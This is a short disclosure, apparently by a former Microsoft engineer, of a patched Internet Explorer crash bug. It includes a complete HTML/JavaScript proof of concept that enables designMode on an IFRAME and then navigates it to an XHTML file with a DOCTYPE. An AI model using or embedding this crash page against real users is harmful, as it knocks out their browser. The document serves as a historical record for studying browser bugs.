Enabling designMode on an IFRAME’s document and then navigating the IFRAME to an XHTML file that contains a DOCTYPE declaration crashes IE. The designMode state apparently conflicts with XHTML’s DTD processing during the navigation.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_designMode_DTD_XHTML</title></head>
<body>
<font face="Tahoma" size="2">
<center>
<h2>DoS_designMode_DTD_XHTML</h2>
<iframe name="designModeIframe" width="100" height="100"></iframe><br /><br />
<input type="button" value="CrashMe" onclick="setTimeout('crashMe()',100)"><br /><br />
</center>
<hr /><br />
1) Turn <b>on</b> the <b>designMode</b> of the IFRAME.<br /><br />
2) Change the location of the IFRAME to <u>any valid <b>xhtml</b> file</u> that at least contains the <b>docType tag</b>.<br /><br /><hr />

</font>

<script language="JavaScript">
function crashMe()
{
	designModeIframe.document.designMode = "on";
	designModeIframe.location.replace("iframe.html");
}
</script>
</body>
</html>

The iframe.html target is a minimal XHTML file containing only the DOCTYPE declaration. When designMode is already set to "on" and the IFRAME then loads a document with a proper XHTML doctype, the mode transition through DTD parsing triggers a crash. The 100ms setTimeout before calling crashMe is needed to ensure the initial IFRAME state is ready.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.